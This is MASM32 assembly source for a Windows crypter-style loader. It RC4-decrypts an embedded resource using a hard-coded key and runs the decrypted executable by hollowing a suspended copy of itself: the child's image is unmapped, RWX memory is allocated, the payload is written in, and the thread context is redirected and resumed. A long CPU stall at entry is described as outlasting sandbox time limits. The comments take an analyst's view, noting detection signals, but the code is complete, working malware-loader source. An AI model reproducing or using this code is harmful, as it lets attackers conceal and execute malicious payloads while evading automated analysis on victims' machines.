; 32-bit Windows (flat/stdcall) MASM32 build.  Three procedures follow:
; Rc4_setkey / Rc4_crypt (RC4 over a global 256-byte state) and
; ExtractFile, which decrypts an embedded RCDATA resource with the key
; below and runs it inside a suspended copy of this executable.  All of
; them work on the globals declared here.
.386
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\shell32.inc
include \masm32\include\ntdll.inc       ; ZwUnmapViewOfSection (used by ExtractFile)
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\ntdll.lib

.data
mPath byte 256 dup (0)                  ; path of this executable; filled by GetModuleFileName in ExtractFile
password byte 'datpass', 0              ; RC4 key kept as a plaintext literal: it is recoverable verbatim from
                                        ; the binary's .data section (a `strings` pass shows it), so the
                                        ; encrypted resource can be decrypted offline during triage
.data?
hInstance dword ?                       ; GetModuleHandle(0) of this process (set in ExtractFile)
loop_stopper dword ?                    ; countdown for the busy-wait loop at _entrypoint
ResInf        dword ?                   ; pointer to the locked RCDATA resource; after Rc4_crypt it holds the plaintext PE
hResourceSize dword ?                   ; SizeofResource() of that resource, in bytes
rc4keytable db 256 dup (?)              ; RC4 permutation S[0..255], shared by Rc4_setkey and Rc4_crypt
.code
;-----------------------------------------------------------------------
; void Rc4_setkey(const BYTE *Pass, DWORD LenPass)         (stdcall)
; RC4 key schedule (KSA) over the global rc4keytable.
; In:    Pass = key bytes, LenPass = key length in bytes
; Out:   rc4keytable holds the keyed permutation; no register result
; Clobb: nothing visible to the caller (pushad/popad); flags
; Notes: LenPass = 0 is not rejected: esi is decremented to 0FFFFFFFFh
;        before the zero test, so the key index keeps advancing past
;        Pass for all 256 rounds (reads beyond the key buffer).  The key
;        index is kept in bl, so key offsets above 255 wrap to 0.
;-----------------------------------------------------------------------
Rc4_setkey proc Pass:DWORD, LenPass:DWORD
    pushad

    ; S[i] = i, written one dword at a time from the top of the table:
    ; 0FFFEFDFCh lands on S[252..255], each following dword is 04040404h
    ; smaller, and the last store puts 03020100h on S[0..3].
    mov eax, 0FFFEFDFCh
    mov ecx, 256/4
Init_rc4keytable:
    mov dword ptr [rc4keytable+4*ecx-4], eax
    sub eax, 04040404h
    dec ecx
    jnz Init_rc4keytable

    ; Register roles for the mixing pass (ecx is 0 on arrival here):
    ;   cl = i, al = j, bl = key index k, esi = key bytes left before k
    ;   restarts, edi = Pass.  Only the low bytes of eax/ecx are ever
    ;   modified, so the full registers index rc4keytable directly.
    xor eax, eax
    mov edi, Pass

Key_return:                         ; k reached LenPass: restart the key at offset 0
    xor ebx, ebx
    mov esi ,LenPass
    jmp New_key

Key_loop:
    inc bl                          ; k++
    dec esi
    jz Key_return

New_key:
    ; j = j + key[k] + S[i]  (mod 256);  swap S[i], S[j]
    mov dl, byte ptr [rc4keytable+ecx]
    add al, byte ptr [edi+ebx]
    add al, dl
    mov dh, byte ptr [rc4keytable+eax]
    mov byte ptr [rc4keytable+ecx], dh
    mov byte ptr [rc4keytable+eax], dl
    inc cl                          ; i++; ZF is set when cl wraps to 0, ending the pass after 256 rounds
    jnz Key_loop

    popad
    ret
Rc4_setkey endp
  58.  
;-----------------------------------------------------------------------
; void Rc4_crypt(BYTE *iData, DWORD LenData)               (stdcall)
; RC4 keystream (PRGA) XORed over the buffer in place; the same call
; both encrypts and decrypts.  Must follow Rc4_setkey.
; In:    iData = buffer, LenData = byte count
; Out:   buffer transformed in place; rc4keytable is then zeroed, so a
;        second call cannot continue the keystream (it would run on an
;        all-zero state)
; Clobb: nothing visible to the caller (pushad/popad); DF is left clear
;        by cld (EFLAGS are not restored by popad)
; Notes: LenData = 0 jumps straight to the exit and skips the wipe.
;-----------------------------------------------------------------------
Rc4_crypt proc iData:DWORD, LenData:DWORD
    pushad
    mov edi, LenData                ; edi = bytes remaining
    mov esi, iData                  ; esi -> current byte
    test edi, edi
    jz Rc4_enc_exit

    ; bl = i, al = j; the upper bytes stay zero so eax/ebx/ecx can be
    ; used directly as table indices.
    xor eax, eax
    xor edx, edx
    xor ecx, ecx
    xor ebx, ebx

Rc4_enc_loop:
    inc bl                                  ; i = i + 1 (mod 256)
    mov dl, byte ptr [rc4keytable+ebx]      ; dl = S[i]
    add al, dl                              ; j = j + S[i] (mod 256)
    mov cl, byte ptr [rc4keytable+eax]      ; cl = S[j]
    mov byte ptr [rc4keytable+ebx], cl      ; swap S[i], S[j]
    mov byte ptr [rc4keytable+eax], dl
    add cl, dl                              ; cl = S[i] + S[j] (mod 256), post-swap
    mov cl, byte ptr [rc4keytable+ecx]      ; keystream byte = S[S[i] + S[j]]
    xor byte ptr [esi], cl
    inc esi
    dec edi
    jnz Rc4_enc_loop

    ; Wipe the state: 64 dword stores of zero across rc4keytable.
    xor eax, eax
    mov edi, offset rc4keytable
    mov ecx, 256/4
    cld
    rep stosd

Rc4_enc_exit:
    popad
    ret
Rc4_crypt endp
  95.  
;-----------------------------------------------------------------------
; void ExtractFile(void)                                    (stdcall)
; Decrypts RCDATA resource 1212 of this executable with the hard-coded
; `password`, then executes the decrypted PE by hollowing a new,
; suspended instance of this same executable.  The visible API chain is
; CreateProcess(CREATE_SUSPENDED) -> GetThreadContext ->
; ZwUnmapViewOfSection -> VirtualAllocEx(PAGE_EXECUTE_READWRITE) ->
; WriteProcessMemory (headers, then every section) -> SetThreadContext
; -> ResumeThread.  That sequence, and a child whose in-memory image no
; longer matches its file on disk, are the points a detection rule or a
; memory-forensics pass keys on.  After Rc4_crypt the plaintext PE also
; remains in this process at ResInf.
; Locals: hResource; sinfo/pinfo (child process); base (child image
;         base); sec (first IMAGE_SECTION_HEADER); cnt (thread context)
; Out:    nothing; no register result
; Notes:  the only `ret` is inside the innermost .if.  On every failure
;         path (resource not found, size 0, LoadResource failed) control
;         falls off `endp` into `_entrypoint`, which follows this proc in
;         the file, with this frame still on the stack: the delay loop
;         restarts and ExtractFile is invoked again.  Return values of
;         CreateProcess, GetThreadContext, VirtualAllocEx,
;         WriteProcessMemory and SetThreadContext are not checked.
;-----------------------------------------------------------------------
ExtractFile proc
local hResource:dword
LOCAL sinfo: STARTUPINFO
LOCAL pinfo: PROCESS_INFORMATION
LOCAL base: dword
LOCAL sec: ptr IMAGE_SECTION_HEADER
LOCAL cnt: CONTEXT
    invoke GetModuleFileName, 0, offset mPath, 256      ; mPath = this executable, i.e. the hollowing target
    invoke GetModuleHandle, 0
    mov hInstance, eax
    invoke FindResource, hInstance, 1212, RT_RCDATA     ; embedded, RC4-encrypted PE
    .if eax != 0
        mov hResource, eax
        invoke SizeofResource, hInstance, hResource
        .if eax != 0
            mov hResourceSize, eax
            invoke LoadResource, hInstance, hResource
            .if eax != 0
                invoke LockResource, eax
                mov ResInf , eax
                ; Decrypt the resource where it is mapped.
                ; NOTE(review): this writes into the locked resource in place, which
                ; needs the .rsrc pages to be writable in this build -- confirm.
                invoke lstrlen,addr password
                invoke Rc4_setkey,addr password,eax
                invoke Rc4_crypt,ResInf,hResourceSize   ; ResInf now points at the plaintext PE
                invoke RtlZeroMemory, addr sinfo, sizeof STARTUPINFO
                ; Child = another copy of this executable, created suspended so its
                ; initial thread has not executed any of the original image yet.
                invoke CreateProcess, offset mPath, 0, 0, 0, 0, CREATE_SUSPENDED, 0, 0, addr sinfo, addr pinfo
                invoke RtlZeroMemory, addr cnt, sizeof CONTEXT
                mov cnt.ContextFlags, CONTEXT_INTEGER
                invoke GetThreadContext, pinfo.hThread, addr cnt
                ; Unmap the child's original image.  GetModuleHandle(0) is *this*
                ; process's base; the code assumes the child, being the same
                ; executable, is mapped at the same address.
                invoke GetModuleHandle, 0
                invoke ZwUnmapViewOfSection, pinfo.hProcess, eax
                ; edi -> IMAGE_NT_HEADERS of the decrypted PE
                mov edi, ResInf
                add edi, IMAGE_DOS_HEADER.e_lfanew[edi]
                assume edi:  ptr IMAGE_NT_HEADERS
                ; Allocate the payload's preferred ImageBase in the child as RWX.  eax is
                ; stored as `base` without a check, so a failed allocation leaves base = 0.
                invoke VirtualAllocEx, pinfo.hProcess, [edi].OptionalHeader.ImageBase, [edi].OptionalHeader.SizeOfImage, MEM_COMMIT + MEM_RESERVE, PAGE_EXECUTE_READWRITE
                mov base, eax
                ; Copy the headers, then each section's raw data to base + VirtualAddress.
                invoke WriteProcessMemory, pinfo.hProcess, base, ResInf , [edi].OptionalHeader.SizeOfHeaders, 0
                lea eax, [edi].OptionalHeader
                mov sec, eax
                movzx eax, [edi].FileHeader.SizeOfOptionalHeader
                add sec, eax                            ; sec -> first section header (directly after the optional header)
                xor eax, eax
                xor esi, esi                            ; esi = section index
                xor ecx, ecx
                .while ( si < [edi].FileHeader.NumberOfSections )
                    imul eax, esi, sizeof IMAGE_SECTION_HEADER
                    add eax, sec                        ; eax -> section header [esi]
                    mov ebx, base
                    add ebx, IMAGE_SECTION_HEADER.VirtualAddress[eax]     ; destination in the child
                    mov edx, ResInf
                    add edx, IMAGE_SECTION_HEADER.PointerToRawData[eax]   ; source in the decrypted PE
                    invoke WriteProcessMemory, pinfo.hProcess, ebx, edx, IMAGE_SECTION_HEADER.SizeOfRawData[eax],0
                    inc esi
                .endw
                ; Redirect the suspended thread: its context Eax is set to the payload's
                ; entry point (x86 initial-thread convention), then the thread is resumed.
                mov eax, base
                add eax, [edi].OptionalHeader.AddressOfEntryPoint
                mov cnt.regEax, eax
                invoke SetThreadContext, pinfo.hThread, addr cnt
                invoke ResumeThread, pinfo.hThread
                ret
            .endif
        .endif
    .endif
ExtractFile endp
  159.  
;-----------------------------------------------------------------------
; Program entry.  Spins 500,000,000 times through a loop whose only
; effect is decrementing loop_stopper (the push/pop of eax is a no-op):
; a pure CPU stall before the first API call.  A stall of this shape is
; commonly used to outlast automated-analysis time limits, so the gap
; between process start and the first call in ExtractFile is itself a
; behavioural signal.  Then runs ExtractFile and exits.
;-----------------------------------------------------------------------
_entrypoint:
    mov loop_stopper,500000000
loop_start:
    mov eax,0
    push eax
    pop eax
    cmp loop_stopper, 0             ; flags from this cmp are overwritten by the dec below
    dec loop_stopper                ; jg tests the decremented value: loop until loop_stopper reaches 0
    jg loop_start
    invoke ExtractFile
    invoke ExitProcess, 0
end _entrypoint